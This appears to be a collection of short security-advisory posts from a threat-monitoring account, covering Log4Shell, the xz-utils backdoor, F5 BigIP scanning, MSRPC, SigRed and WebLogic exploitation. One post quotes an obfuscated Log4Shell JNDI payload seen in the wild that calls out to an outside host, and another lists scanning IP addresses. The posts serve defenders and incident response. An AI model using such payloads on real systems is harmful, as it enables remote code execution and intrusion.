To whoever is trying to run these Python backdoors on our F5 #BigIP honeypot: Slow down... it doesn't work because you keep overwriting your files. Or randomize your filenames better.
A quick note about xz-utils backdoor:
1 - luckily, this was caught early.
2 - most run xz-utils 5.2/5.4. 5.6 is bad.
3 - quick check: `xz -V`
4 - Thanks to people who paid attention
#log4shell is now a @cnn headline. This means: This is no longer an emergency. Going back to infocon green. Log4j will be a multi-year marathon. Do not treat it like a sprint or you will run out of breath quickly.
OpenSSL 3.0.7 is out. TL;DR: Punycode issue with international domains used in certs. Needs CA to sign malicious cert. Doesn't look like a "huge deal" IMHO. Relax.. Patch.. Repeat... #openssl
Seeing now #log4shell exploit attempts that obfuscate: ${jndi:${lower:l}${lower:d}a${lower:p}://world80[.]log4j[.]bin${upper:a}ryedge[.]io:80/callback} and also ldaps vs ldap. This particular attempt is from Binaryedge (researcher scans).
So far I found 4 domains registered yesterday with the keyword "Beirut". They appear to be inactive so far. Be careful out there. Verify any entities asking for help. #beirut #lebanon
Please remember: Port 445 is just ONE of the ports that may reach #RPC (CVE-2022-26809) on Windows. #MSRPC does Port 135 (and high port) or in some cases HTTP as well. Don't "close some ports" but "only open ports you need open". #allowlist #dontblocklist
We are so far seeing 3 main types of user agents exploiting #log4jshell:
- "bingsearchlib[.]com" (not related to Bing/MSFT AFAIK)
- modified AutoMate 1.0 user agent
- user-agent with Base64 encoded exploit.
The #msdt 0-day currently being exploited can be blocked by removing the handler. Note that this may block legit uses (but not sure there are any/enough to not apply this workaround).
Current Top IPs scanning for #BigIP #CVE20205902 @f5Networks. cve-2020-5902
117.107.193.98 - Chinese EDU
103.220.209.47 - India Broadband
93.173.92.102 - Israel ISP
18.185.237.34 - Amazon EU
58.49.50.122 - Chinanet
52.119.83.108 - US Mobile ISP
179.9.166.185 - Chile ISP
The Microsoft DNS #sigred vulnerability (CVE-2020-1350): drop what you are doing and patch it now (if this isn't what you are doing..) if you don't run MSFT DNS: double check...
After the initial flurry of scanning for the #WebLogic flaw yesterday, we are now seeing some "actual" exploit attempts. And of course, people popping calc.exe. If your WebLogic server has a Calculator running this morning: You have a problem!